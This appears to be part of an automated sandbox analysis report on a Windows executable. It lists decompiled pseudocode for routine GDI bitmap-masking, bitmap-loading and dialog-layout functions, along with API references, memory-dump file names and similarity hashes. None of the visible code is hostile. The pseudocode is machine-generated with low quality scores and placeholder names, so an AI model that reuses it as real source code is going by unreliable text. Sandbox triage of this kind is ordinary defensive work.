      • SetBkColor.GDI32(?,00FFFFFF), ref: 0042726A
      • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00427296
      • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 004272BB
      • SetTextColor.GDI32(?,?), ref: 004272C5
      • SetBkColor.GDI32(?,?), ref: 004272CF
      • SelectObject.GDI32(?,00000000), ref: 004272E2
      • DeleteObject.GDI32(?), ref: 004272EB
      • 73BEB410.GDI32(?,00000000,00000000,00427323,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0042730D
      • DeleteDC.GDI32(?), ref: 00427316
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
      • String ID:
      • API String ID: 3348367721-0
      • Opcode ID: 257c1dc1462feeed0328854930f008e6ef21866e43d843eaa150e9b4d6bb5ac8
      • Instruction ID: 7fab5b141c4dc2b1aadbdaab5ff2f1302420b01c5a1f78798022a214eff543e4
      • Opcode Fuzzy Hash: 257c1dc1462feeed0328854930f008e6ef21866e43d843eaa150e9b4d6bb5ac8
      • Instruction Fuzzy Hash: F981A8B1A04219AFDB50EF99CC85EAF77FCAB0D354F510569F618F7281C638AD008B65
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 51%
      			E0042A70C(void* __eax, long __ecx, intOrPtr __edx) {
      				void* _v8;
      				intOrPtr _v12;
      				struct HDC__* _v16;
      				struct HDC__* _v20;
      				char _v21;
      				void* _v28;
      				void* _v32;
      				intOrPtr _v92;
      				intOrPtr _v96;
      				int _v108;
      				int _v112;
      				void _v116;
      				void* _t64;
      				int _t65;
      				intOrPtr _t66;
      				long _t77;
      				void* _t107;
      				intOrPtr _t116;
      				intOrPtr _t117;
      				long _t120;
      				intOrPtr _t123;
      				void* _t127;
      				void* _t129;
      				intOrPtr _t130;
      
      				_t127 = _t129;
      				_t130 = _t129 + 0xffffff90;
      				_t120 = __ecx;
      				_t123 = __edx;
      				_t107 = __eax;
      				_v8 = 0;
      				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
      					return _v8;
      				} else {
      					E00429C00(_t107);
      					_v12 = 0;
      					_v20 = 0;
      					_push(_t127);
      					_push(0x42a907);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t130;
      					_push(0);
      					L00407658();
      					_v12 = E00426EF8(0);
      					_push(_v12);
      					L00407280();
      					_v20 = E00426EF8(_v12);
      					_push(0);
      					_push(1);
      					_push(1);
      					_push(_v108);
      					_t64 = _v112;
      					_push(_t64);
      					L00407268();
      					_v8 = _t64;
      					if(_v8 == 0) {
      						L17:
      						_t65 = 0;
      						_pop(_t116);
      						 *[fs:eax] = _t116;
      						_push(0x42a90e);
      						if(_v20 != 0) {
      							_t65 = DeleteDC(_v20);
      						}
      						if(_v12 != 0) {
      							_t66 = _v12;
      							_push(_t66);
      							_push(0);
      							L004078C0();
      							return _t66;
      						}
      						return _t65;
      					} else {
      						_v32 = SelectObject(_v20, _v8);
      						if(__ecx != 0x1fffffff) {
      							_push(_v12);
      							L00407280();
      							_v16 = E00426EF8(_v12);
      							_push(_t127);
      							_push(0x42a8bf);
      							_push( *[fs:eax]);
      							 *[fs:eax] = _t130;
      							if(_v96 == 0) {
      								_v21 = 0;
      							} else {
      								_v21 = 1;
      								_v92 = 0;
      								_t107 = E0042A044(_t107, _t123, _t123, 0,  &_v116);
      							}
      							_v28 = SelectObject(_v16, _t107);
      							if(_t123 != 0) {
      								_push(0);
      								_push(_t123);
      								_push(_v16);
      								L00407420();
      								_push(_v16);
      								L004073F0();
      								_push(0);
      								_push(_t123);
      								_push(_v20);
      								L00407420();
      								_push(_v20);
      								L004073F0();
      							}
      							_t77 = SetBkColor(_v16, _t120);
      							_push(0xcc0020);
      							_push(0);
      							_push(0);
      							_push(_v16);
      							_push(_v108);
      							_push(_v112);
      							_push(0);
      							_push(0);
      							_push(_v20);
      							L00407258();
      							SetBkColor(_v16, _t77);
      							if(_v28 != 0) {
      								SelectObject(_v16, _v28);
      							}
      							if(_v21 != 0) {
      								DeleteObject(_t107);
      							}
      							_pop(_t117);
      							 *[fs:eax] = _t117;
      							_push(0x42a8c6);
      							return DeleteDC(_v16);
      						} else {
      							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
      							if(_v32 != 0) {
      								SelectObject(_v20, _v32);
      							}
      							goto L17;
      						}
      					}
      				}
      			}

      0x0042a70d
      0x0042a70f
      0x0042a715
      0x0042a717
      0x0042a719
      0x0042a71d
      0x0042a722
      0x0042a917
      0x0042a73c
      0x0042a73e
      0x0042a745
      0x0042a74a
      0x0042a74f
      0x0042a750
      0x0042a755
      0x0042a758
      0x0042a75b
      0x0042a75d
      0x0042a767
      0x0042a76d
      0x0042a76e
      0x0042a778
      0x0042a77b
      0x0042a77d
      0x0042a77f
      0x0042a784
      0x0042a785
      0x0042a788
      0x0042a789
      0x0042a78e
      0x0042a795
      0x0042a8d9
      0x0042a8d9
      0x0042a8db
      0x0042a8de
      0x0042a8e1
      0x0042a8ea
      0x0042a8f0
      0x0042a8f0
      0x0042a8f9
      0x0042a8fb
      0x0042a8fe
      0x0042a8ff
      0x0042a901
      0x00000000
      0x0042a901
      0x0042a906
      0x0042a79b
      0x0042a7a8
      0x0042a7b1
      0x0042a7d2
      0x0042a7d3
      0x0042a7dd
      0x0042a7e2
      0x0042a7e3
      0x0042a7e8
      0x0042a7eb
      0x0042a7f2
      0x0042a812
      0x0042a7f4
      0x0042a7f4
      0x0042a7fa
      0x0042a80e
      0x0042a80e
      0x0042a820
      0x0042a825
      0x0042a827
      0x0042a829
      0x0042a82d
      0x0042a82e
      0x0042a836
      0x0042a837
      0x0042a83c
      0x0042a83e
      0x0042a842
      0x0042a843
      0x0042a84b
      0x0042a84c
      0x0042a84c
      0x0042a856
      0x0042a85d
      0x0042a862
      0x0042a864
      0x0042a869
      0x0042a86d
      0x0042a871
      0x0042a872
      0x0042a874
      0x0042a879
      0x0042a87a
      0x0042a884
      0x0042a88d
      0x0042a897
      0x0042a897
      0x0042a8a0
      0x0042a8a3
      0x0042a8a3
      0x0042a8aa
      0x0042a8ad
      0x0042a8b0
      0x0042a8be
      0x0042a7b3
      0x0042a7c5
      0x0042a8ca
      0x0042a8d4
      0x0042a8d4
      0x00000000
      0x0042a8ca
      0x0042a7b1
      0x0042a795

      APIs
      • GetObjectA.GDI32(?,00000054,?), ref: 0042A72F
      • 73BEAC50.USER32(00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A75D
      • 73BEA590.GDI32(?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A76E
      • 73BEA410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A789
      • SelectObject.GDI32(?,00000000), ref: 0042A7A3
      • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042A7C5
      • 73BEA590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A7D3
      • SelectObject.GDI32(?), ref: 0042A81B
      • 73BEB410.GDI32(?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0042A82E
      • 73BEB150.GDI32(?,?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000,?,?,00000001,00000001), ref: 0042A837
      • 73BEB410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000,?), ref: 0042A843
      • 73BEB150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000), ref: 0042A84C
      • SetBkColor.GDI32(?), ref: 0042A856
      • 73BF97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,0042A8BF), ref: 0042A87A
      • SetBkColor.GDI32(?,00000000), ref: 0042A884
      • SelectObject.GDI32(?,00000000), ref: 0042A897
      • DeleteObject.GDI32 ref: 0042A8A3
      • DeleteDC.GDI32(?), ref: 0042A8B9
      • SelectObject.GDI32(?,00000000), ref: 0042A8D4
      • DeleteDC.GDI32(00000000), ref: 0042A8F0
      • 73BEB380.USER32(00000000,00000000,0042A90E,00000001,00000000,?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A901
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$Select$Delete$A590B150B410Color$A410B380
      • String ID:
      • API String ID: 2498167796-0
      • Opcode ID: cb9497e594cdfa0144c8054d926578b525af7d76be08e77879cf5cb8d3eea044
      • Instruction ID: c5d24e51c5f042388fee44124175c2a35ead77c821609f90a659b66130d5fabb
      • Opcode Fuzzy Hash: cb9497e594cdfa0144c8054d926578b525af7d76be08e77879cf5cb8d3eea044
      • Instruction Fuzzy Hash: 30512171F04218ABDB10EBE9DC45FAFB7FCAB08704F51446AB614F7281D678A940CB69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 65%
      			E0042B430(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
      				intOrPtr _v8;
      				intOrPtr* _v12;
      				void* _v16;
      				struct HDC__* _v20;
      				char _v24;
      				intOrPtr* _v28;
      				intOrPtr _v32;
      				char _v36;
      				signed int _v37;
      				intOrPtr _v44;
      				void* _v48;
      				struct HDC__* _v52;
      				intOrPtr _v56;
      				intOrPtr* _v60;
      				intOrPtr* _v64;
      				short _v66;
      				short _v68;
      				signed short _v70;
      				signed short _v72;
      				void* _v76;
      				intOrPtr _v172;
      				char _v174;
      				intOrPtr _t150;
      				signed int _t160;
      				intOrPtr _t163;
      				void* _t166;
      				void* _t174;
      				void* _t183;
      				signed int _t188;
      				intOrPtr _t189;
      				struct HDC__* _t190;
      				struct HDC__* _t204;
      				signed int _t208;
      				signed short _t214;
      				intOrPtr _t241;
      				intOrPtr* _t245;
      				intOrPtr _t251;
      				char* _t278;
      				intOrPtr _t289;
      				intOrPtr _t290;
      				intOrPtr _t295;
      				signed int _t297;
      				signed int _t317;
      				void* _t319;
      				void* _t320;
      				signed int _t321;
      				void* _t322;
      				void* _t323;
      				void* _t324;
      				intOrPtr _t325;
      
      				_t316 = __edi;
      				_t323 = _t324;
      				_t325 = _t324 + 0xffffff54;
      				_t319 = __ecx;
      				_v12 = __edx;
      				_v8 = __eax;
      				_v52 = 0;
      				_v44 = 0;
      				_v60 = 0;
      				_t278 =  &_v36;
      				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
      				_v37 = _v36 == 0xc;
      				if(_v37 != 0) {
      					_v36 = 0x28;
      				}
      				_v28 = E00402ACC(_v36 + 0x40c, 4, _t278);
      				_v64 = _v28;
      				_push(_t323);
      				_push(0x42b94d);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t325;
      				_push(_t323);
      				_push(0x42b920);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t325;
      				if(_v37 == 0) {
      					 *((intOrPtr*)( *_v12 + 0xc))();
      					_t320 = _t319 - _v36;
      					_t150 =  *((intOrPtr*)(_v64 + 0x10));
      					if(_t150 != 3 && _t150 != 0) {
      						_v60 = E00403BC0(1);
      						if(_a4 == 0) {
      							E00403498( &_v174, 0xe);
      							_v174 = 0x4d42;
      							_v172 = _v36 + _t320;
      							_a4 =  &_v174;
      						}
      						 *((intOrPtr*)( *_v60 + 0x10))();
      						 *((intOrPtr*)( *_v60 + 0x10))();
      						 *((intOrPtr*)( *_v60 + 0x10))();
      						E0041C440(_v60,  *_v60, _v36 - 4, _v12, _t316, _t320, _t320, 0);
      						 *((intOrPtr*)( *_v60 + 0x14))();
      						_v12 = _v60;
      					}
      				} else {
      					 *((intOrPtr*)( *_v12 + 0xc))();
      					_t251 = _v64;
      					E00403498(_t251, 0x28);
      					_t241 = _t251;
      					 *(_t241 + 4) = _v72 & 0x0000ffff;
      					 *(_t241 + 8) = _v70 & 0x0000ffff;
      					 *((short*)(_t241 + 0xc)) = _v68;
      					 *((short*)(_t241 + 0xe)) = _v66;
      					_t320 = _t319 - 0xc;
      				}
      				_t245 = _v64;
      				 *_t245 = _v36;
      				_v32 = _v28 + _v36;
      				if( *((short*)(_t245 + 0xc)) != 1) {
      					E00426DD8();
      				}
      				if(_v36 == 0x28) {
      					_t214 =  *(_t245 + 0xe);
      					if(_t214 == 0x10 || _t214 == 0x20) {
      						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
      							E0041C3D0(_v12, 0xc, _v32);
      							_v32 = _v32 + 0xc;
      							_t320 = _t320 - 0xc;
      						}
      					}
      				}
      				if( *(_t245 + 0x20) == 0) {
      					 *(_t245 + 0x20) = E00427068( *(_t245 + 0xe));
      				}
      				_t317 = _v37 & 0x000000ff;
      				_t257 =  *(_t245 + 0x20) * 0;
      				E0041C3D0(_v12,  *(_t245 + 0x20) * 0, _v32);
      				_t321 = _t320 -  *(_t245 + 0x20) * 0;
      				if( *(_t245 + 0x14) == 0) {
      					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
      					_t208 = E00427088( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
      					asm("cdq");
      					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
      					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
      				}
      				_t160 =  *(_t245 + 0x14);
      				if(_t321 > _t160) {
      					_t321 = _t160;
      				}
      				if(_v37 != 0) {
      					_t160 = E00427330(_v32);
      				}
      				_push(0);
      				L00407658();
      				_v16 = E00426EF8(_t160);
      				_push(_t323);
      				_push(0x42b89b);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t325;
      				_t163 =  *((intOrPtr*)(_v64 + 0x10));
      				if(_t163 == 0 || _t163 == 3) {
      					if( *0x48e4f0 == 0) {
      						_push(0);
      						_push(0);
      						_push( &_v24);
      						_push(0);
      						_push(_v28);
      						_t166 = _v16;
      						_push(_t166);
      						L00407290();
      						_v44 = _t166;
      						if(_v44 == 0 || _v24 == 0) {
      							if(GetLastError() != 0) {
      								E0040E218(_t245, _t257, _t317, _t321);
      							} else {
      								E00426DD8();
      							}
      						}
      						_push(_t323);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t325;
      						E0041C3D0(_v12, _t321, _v24);
      						_pop(_t289);
      						 *[fs:eax] = _t289;
      						_t290 = 0x42b86a;
      						 *[fs:eax] = _t290;
      						_push(0x42b8a2);
      						_t174 = _v16;
      						_push(_t174);
      						_push(0);
      						L004078C0();
      						return _t174;
      					} else {
      						goto L27;
      					}
      				} else {
      					L27:
      					_v20 = 0;
      					_v24 = E00402ACC(_t321, _t257, 0);
      					_push(_t323);
      					_push(0x42b803);
      					_push( *[fs:edx]);
      					 *[fs:edx] = _t325;
      					_t263 = _t321;
      					E0041C3D0(_v12, _t321, _v24);
      					_push(_v16);
      					L00407280();
      					_v20 = E00426EF8(_v16);
      					_push(1);
      					_push(1);
      					_t183 = _v16;
      					_push(_t183);
      					L00407278();
      					_v48 = SelectObject(_v20, _t183);
      					_v56 = 0;
      					_t188 =  *(_v64 + 0x20);
      					if(_t188 > 0) {
      						_t263 = _t188;
      						_v52 = E004275F4(0, _t188);
      						_push(0);
      						_push(_v52);
      						_t204 = _v20;
      						_push(_t204);
      						L00407420();
      						_v56 = _t204;
      						_push(_v20);
      						L004073F0();
      					}
      					_push(_t323);
      					_push(0x42b7d7);
      					_push( *[fs:edx]);
      					 *[fs:edx] = _t325;
      					_push(0);
      					_t189 = _v28;
      					_push(_t189);
      					_push(_v24);
      					_push(4);
      					_push(_t189);
      					_t190 = _v20;
      					_push(_t190);
      					L00407298();
      					_v44 = _t190;
      					if(_v44 == 0) {
      						if(GetLastError() != 0) {
      							E0040E218(_t245, _t263, _t317, _t321);
      						} else {
      							E00426DD8();
      						}
      					}
      					_pop(_t295);
      					 *[fs:eax] = _t295;
      					_push(0x42b7de);
      					if(_v56 != 0) {
      						_push(0xffffffff);
      						_push(_v56);
      						_push(_v20);
      						L00407420();
      					}
      					return DeleteObject(SelectObject(_v20, _v48));
      				}
      			}

      0x0042b430
      0x0042b431
      0x0042b433
      0x0042b43c
      0x0042b43e
      0x0042b441
      0x0042b446
      0x0042b44b
      0x0042b450
      0x0042b453
      0x0042b460
      0x0042b467
      0x0042b46f
      0x0042b471
      0x0042b471
      0x0042b488
      0x0042b48e
      0x0042b493
      0x0042b494
      0x0042b499
      0x0042b49c
      0x0042b4a1
      0x0042b4a2
      0x0042b4a7
      0x0042b4aa
      0x0042b4b1
      0x0042b510
      0x0042b513
      0x0042b519
      0x0042b51f
      0x0042b539
      0x0042b540
      0x0042b54f
      0x0042b554
      0x0042b562
      0x0042b56e
      0x0042b56e
      0x0042b57e
      0x0042b58e
      0x0042b5a2
      0x0042b5b1
      0x0042b5c3
      0x0042b5c9
      0x0042b5c9
      0x0042b4b3
      0x0042b4c3
      0x0042b4c6
      0x0042b4d2
      0x0042b4d7
      0x0042b4dd
      0x0042b4e4
      0x0042b4eb
      0x0042b4f3
      0x0042b4f7
      0x0042b4f7
      0x0042b5cc
      0x0042b5d2
      0x0042b5da
      0x0042b5e2
      0x0042b5e4
      0x0042b5e4
      0x0042b5ed
      0x0042b5ef
      0x0042b5f7
      0x0042b603
      0x0042b610
      0x0042b615
      0x0042b619
      0x0042b619
      0x0042b603
      0x0042b5f7
      0x0042b620
      0x0042b62b
      0x0042b62b
      0x0042b631
      0x0042b63d
      0x0042b646
      0x0042b658
      0x0042b65e
      0x0042b660
      0x0042b66c
      0x0042b676
      0x0042b67b
      0x0042b67e
      0x0042b67e
      0x0042b681
      0x0042b686
      0x0042b688
      0x0042b688
      0x0042b68e
      0x0042b693
      0x0042b693
      0x0042b698
      0x0042b69a
      0x0042b6a4
      0x0042b6a9
      0x0042b6aa
      0x0042b6af
      0x0042b6b2
      0x0042b6b8
      0x0042b6bd
      0x0042b6cb
      0x0042b80a
      0x0042b80c
      0x0042b811
      0x0042b812
      0x0042b817
      0x0042b818
      0x0042b81b
      0x0042b81c
      0x0042b821
      0x0042b828
      0x0042b837
      0x0042b840
      0x0042b839
      0x0042b839
      0x0042b839
      0x0042b837
      0x0042b847
      0x0042b84d
      0x0042b850
      0x0042b85b
      0x0042b862
      0x0042b865
      0x0042b884
      0x0042b887
      0x0042b88a
      0x0042b88f
      0x0042b892
      0x0042b893
      0x0042b895
      0x0042b89a
      0x00000000
      0x00000000
      0x00000000
      0x0042b6d1
      0x0042b6d1
      0x0042b6d3
      0x0042b6dd
      0x0042b6e2
      0x0042b6e3
      0x0042b6e8
      0x0042b6eb
      0x0042b6f1
      0x0042b6f6
      0x0042b6fe
      0x0042b6ff
      0x0042b709
      0x0042b70c
      0x0042b70e
      0x0042b710
      0x0042b713
      0x0042b714
      0x0042b723
      0x0042b728
      0x0042b72e
      0x0042b733
      0x0042b735
      0x0042b741
      0x0042b744
      0x0042b749
      0x0042b74a
      0x0042b74d
      0x0042b74e
      0x0042b753
      0x0042b759
      0x0042b75a
      0x0042b75a
      0x0042b761
      0x0042b762
      0x0042b767
      0x0042b76a
      0x0042b76d
      0x0042b76f
      0x0042b772
      0x0042b776
      0x0042b777
      0x0042b779
      0x0042b77a
      0x0042b77d
      0x0042b77e
      0x0042b783
      0x0042b78a
      0x0042b793
      0x0042b79c
      0x0042b795
      0x0042b795
      0x0042b795
      0x0042b793
      0x0042b7a3
      0x0042b7a6
      0x0042b7a9
      0x0042b7b2
      0x0042b7b4
      0x0042b7b9
      0x0042b7bd
      0x0042b7be
      0x0042b7be
      0x0042b7d6
      0x0042b7d6

      APIs
      • 73BEAC50.USER32(00000000,?,00000000,0042B94D,?,?), ref: 0042B69A
      • 73BEA590.GDI32(00000001,00000000,0042B803,?,00000000,0042B89B,?,00000000,?,00000000,0042B94D,?,?), ref: 0042B6FF
      • 73BEA520.GDI32(00000001,00000001,00000001,00000001,00000000,0042B803,?,00000000,0042B89B,?,00000000,?,00000000,0042B94D,?,?), ref: 0042B714
      • SelectObject.GDI32(?,00000000), ref: 0042B71E
      • 73BEB410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042B803,?,00000000,0042B89B,?,00000000), ref: 0042B74E
      • 73BEB150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042B803,?,00000000,0042B89B), ref: 0042B75A
      • 73BEA7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042B7D7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042B77E
      • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042B7D7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042B78C
      • 73BEB410.GDI32(?,00000000,000000FF,0042B7DE,00000000,?,00000000,00000000,0042B7D7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042B7BE
      • SelectObject.GDI32(?,?), ref: 0042B7CB
      • DeleteObject.GDI32(00000000), ref: 0042B7D1
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$B410Select$A520A590B150DeleteErrorLast
      • String ID: ($BM$d}A
      • API String ID: 3415089252-1836360114
      • Opcode ID: 6effc5624fafab1c5065017b6cf8d6cba7e71a5f88f5188ee129ee5574d3360e
      • Instruction ID: f771b1029cabab020be9d832f8947b46938341ea818d3eeb431794def607108f
      • Opcode Fuzzy Hash: 6effc5624fafab1c5065017b6cf8d6cba7e71a5f88f5188ee129ee5574d3360e
      • Instruction Fuzzy Hash: 73D13074F002189FDF14EFA9D885AAEBBB5EF49304F54846AE904E7391D7389840CB69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 89%
      			E0043D70C(intOrPtr __eax, void* __ebx, signed char __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
      				intOrPtr _v8;
      				char _v9;
      				signed int _v11;
      				intOrPtr* _v16;
      				int _v20;
      				int _v24;
      				int _v28;
      				int _v32;
      				int _v36;
      				signed int _v40;
      				int _v44;
      				signed int _v48;
      				intOrPtr _v52;
      				signed int _v56;
      				intOrPtr _v60;
      				char _v61;
      				char _v62;
      				CHAR* _v68;
      				intOrPtr* _v72;
      				char _v76;
      				intOrPtr* _v80;
      				struct tagRECT _v96;
      				char _v100;
      				char _v104;
      				char _v108;
      				char _v112;
      				intOrPtr _t203;
      				int _t220;
      				signed int _t224;
      				void* _t228;
      				CHAR* _t231;
      				signed int _t240;
      				signed int _t256;
      				signed int _t264;
      				intOrPtr* _t267;
      				signed int _t296;
      				signed int _t297;
      				intOrPtr _t321;
      				void* _t339;
      				signed int _t351;
      				signed int _t356;
      				CHAR* _t363;
      				int _t374;
      				void* _t375;
      				void* _t376;
      				void* _t377;
      				void* _t378;
      				signed int _t419;
      				signed int _t422;
      				intOrPtr _t441;
      				void* _t448;
      				int _t457;
      				intOrPtr* _t459;
      				int _t463;
      				intOrPtr* _t464;
      				intOrPtr _t465;
      				intOrPtr* _t470;
      				void* _t471;
      				void* _t473;
      				void* _t477;
      				void* _t481;
      				void* _t485;
      				void* _t490;
      				void* _t491;
      				void* _t500;
      				void* _t506;
      
      				_t506 = __fp0;
      				_v112 = 0;
      				_v108 = 0;
      				_v104 = 0;
      				_v100 = 0;
      				_v11 = __ecx;
      				_v9 = __edx;
      				_v8 = __eax;
      				 *[fs:eax] = _t473 + 0xffffff94;
      				_v16 = E0043D230(1, __edi);
      				_t384 =  *_v16;
      				 *((intOrPtr*)( *_v16 + 0x70))( *[fs:eax], 0x43dc7b, _t473, __edi, __esi, __ebx, _t471);
      				E0045E3DC(_v16, 3);
      				E00426A20(E0045E694(_v16));
      				 *((char*)(_v16 + 0x22d)) = 1;
      				_t203 = _v16;
      				 *((intOrPtr*)(_t203 + 0x1dc)) = _v16;
      				 *((intOrPtr*)(_t203 + 0x1d8)) = E0043D2C0;
      				E0043D064(E0045E694(_v16),  &_v24);
      				_t374 = _v24;
      				_v28 = MulDiv(8, _t374, 4);
      				_t463 = _v20;
      				_v32 = MulDiv(8, _t463, 8);
      				_t457 = MulDiv(0xa, _t374, 4);
      				_v36 = MulDiv(0xa, _t463, 8);
      				_v40 = MulDiv(0x32, _t374, 4);
      				_t375 = 0;
      				_t464 = 0x490a88;
      				_v76 = 0x48eb7c;
      				do {
      					_t477 = _t375 - 0xf;
      					if(_t477 <= 0) {
      						asm("bt [ebp-0x7], eax");
      					}
      					if(_t477 < 0) {
      						if( *_t464 == 0) {
      							_t384 = 0;
      							E00418618(0, 0, 0,  &_v96, 0);
      							_t356 = E00446C5C(_v16);
      							_t35 =  &_v76; // 0x48eb7c
      							E00406A3C( *((intOrPtr*)( *_t35)), 0,  &_v100);
      							_t363 = E00404F00(_v100);
      							DrawTextA(E00426B00(E0045E694(_v16)), _t363, 0xffffffff,  &_v96, _t356 | 0x00000420);
      							 *_t464 = _v96.right - _v96.left + 8;
      						}
      						_t351 =  *_t464;
      						if(_t351 > _v40) {
      							_v40 = _t351;
      						}
      					}
      					_t375 = _t375 + 1;
      					_v76 = _v76 + 4;
      					_t464 = _t464 + 4;
      					_t481 = _t375 - 0xb;
      				} while (_t481 != 0);
      				_v44 = MulDiv(0xe, _v20, 8);
      				_v48 = MulDiv(4, _v24, 4);
      				_push(0);
      				_t220 = E00461FD4() >> 1;
      				if(_t481 < 0) {
      					asm("adc eax, 0x0");
      				}
      				SetRect( &_v96, 0, 0, _t220, ??);
      				_t224 = E00446C5C(_v16);
      				_t228 = E00404D00(_v8);
      				_t231 = E00404F00(_v8);
      				DrawTextA(E00426B00(E0045E694(_v16)), _t231, _t228 + 1,  &_v96, _t224 | 0x00000450);
      				_v68 =  *((intOrPtr*)(0x48eb3c));
      				_t465 = _v96.right;
      				_v52 = _v96.bottom;
      				if(_v68 != 0) {
      					_t465 = _t465 + _t457 + 0x20;
      					if(_v52 < 0x20) {
      						_v52 = 0x20;
      					}
      				}
      				_t240 = 0;
      				_t376 = 0;
      				do {
      					_t485 = _t376 - 0xf;
      					if(_t485 <= 0) {
      						asm("bt [ebp-0x7], edx");
      					}
      					if(_t485 < 0) {
      						_t240 = _t240 + 1;
      					}
      					_t376 = _t376 + 1;
      				} while (_t376 != 0xb);
      				_t377 = 0;
      				if(_t240 != 0) {
